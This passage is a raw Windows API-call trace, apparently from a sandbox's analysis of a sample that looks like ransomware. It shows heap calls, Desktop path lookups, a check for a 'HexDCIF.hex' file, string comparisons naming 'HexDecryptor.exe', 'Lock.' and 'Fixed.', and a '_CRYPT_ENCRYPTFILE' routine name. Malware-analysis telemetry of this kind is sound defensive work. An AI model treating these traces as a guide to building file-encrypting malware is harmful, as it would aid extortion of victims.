GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex")) returned 0xffffffff [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0161.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0161.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0161.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0161.537] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0161.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0161.537] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0161.537] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0161.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0161.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0161.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0161.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0161.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexDecryptor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exDecryptor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xDecryptor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Decryptor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ecryptor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cryptor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ryptor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yptor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tor.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="or.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0161.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0161.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0161.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0161.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0161.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0161.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0161.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0161.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0161.538] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0161.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0161.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0161.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0161.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x22) returned 0x977db8 [0161.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0161.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexDecryptor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exDecryptor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.539] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xDecryptor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Decryptor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ecryptor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cryptor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0161.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ryptor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yptor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tor.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.540] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="or.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0161.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0161.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0161.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0161.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0161.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0161.541] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0161.541] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0161.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0161.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0161.541] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0161.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0161.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0161.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0161.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0161.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0161.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0161.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0161.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0161.542] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0161.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0161.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0161.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0161.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0161.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0161.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0161.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0161.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0161.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0161.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0161.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0161.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0161.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0161.544] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0161.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0161.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0161.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0161.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0161.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0161.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0161.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0161.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0161.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0161.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0161.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0161.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0161.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0161.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0161.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0161.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0161.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0161.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0161.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0161.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0161.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0161.547] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0161.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0161.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0161.547] RtlAllocateHeap 